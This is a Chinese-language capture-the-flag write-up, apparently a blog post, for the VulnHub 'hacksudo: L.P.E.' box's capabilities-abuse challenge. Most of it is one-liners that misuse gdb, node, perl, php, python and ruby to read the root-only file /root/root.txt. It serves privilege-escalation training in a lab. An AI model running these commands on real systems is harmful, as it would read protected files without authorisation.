vulnhub刷題記錄(hacksudo: L.P.E.)-增2
- 英文名稱 :hacksudo: L.P.E.
- 中文名稱 :hacksudo:LPE
- 釋出日期 :2021 年 5 月 16 日
- 難度 :容易
- 描述 :這個盒子是為提高 Linux 特權升級技能而建立的,希望大家喜歡,hacksudo LPE 更新將很快上傳。這是測試版。找到 root.txt 標誌,將其提交到 Discord 上的 mybox 頻道。
- 下載地址 :
http://www.vulnhub.com/entry/hacksudo-lpe,698/
挑戰3:特權能力濫用挑戰,主線: ailx10:vulnhub刷題記錄(hacksudo: L.P.E.)
7、Challenge 3(Capabilities Abusing Challenge)
7.1 gdb Abusing
gdb -nx -ex 'python print(open("/root/root.txt").read())' -ex quit
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b724b71b5e42e4c426fb95056d1d591cbf63c6800e6a820a9b94e1486e45f684e.jpg)
7.2 node abusing
node -e 'process.stdout.write(require("fs").readFileSync("/root/root.txt"))'
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af98393dfc3c16254b94dd512c9251418657a545c3af339bb332a8d1172a9e90cf4a275.jpg)
7.3 perl Abusing
perl -ne print /root/root.txt
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b0a1052d2cdb9663100ec9019862402327b1a01a30700207a9f244066f6d3e3d5.jpg)
7.4 php Abusing
export LFILE=/root/root.txt php -r 'readfile(getenv("LFILE"));'
![](http://mdimg.wxwenku.com/getimg/6b990ce30fa9193e296dd37902816f4b2def1ffb2df6f7e17c5147f04c0184a78680b4195b4eac7704e81e39789de1d0.jpg)
7.5 python Abusing
python -c 'print(open("/root/root.txt").read())'
![](http://mdimg.wxwenku.com/getimg/ccdf080c7af7e8a10e9b88444af983939b3359451eced3a807a3a2bee1549b5111f89e0adc43b8997d7648a6a28c172c.jpg)
7.6 ruby Abusing
ruby -e 'puts File.read("/root/root.txt")'
![](http://mdimg.wxwenku.com/getimg/356ed03bdc643f9448b3f6485edc229b710cb664107d584dde0cff98c4f1221f2663e72af918de971cd7117e54e102fa.jpg)
7.7 python3 Abusing
python3 -c 'print(open("/root/root.txt").read())'
「其他文章」
- vulnhub刷題記錄(hacksudo: L.P.E.)-增2
- vulnhub刷題記錄(hacksudo: L.P.E.)-增1
- ailx10的專欄電子書
- vulnhub刷題記錄(Funbox:Lunchbreaker)
- vulnhub刷題記錄(HACKABLE: II)
- vulnhub刷題記錄(Hack Me Please: 1)
- vulnhub刷題記錄(EVILBOX: ONE)
- vulnhub刷題記錄(Deathnote: 1)
- vulnhub刷題記錄(Dripping Blues: 1)
- vulnhub刷題記錄(ICA: 1)
- vulnhub刷題記錄(The Planets: Earth)
- 手機監控有什麼危害?
- SIEM和XDR下的安全分析小感悟
- 你的手機曾經被監控過嗎?
- 如何正則匹配亂碼?
- portmap 埠轉發
- socat 埠轉發
- 電腦監控是真的嗎?4個實驗一探究竟
- ufw 埠轉發
- SSH本地埠轉發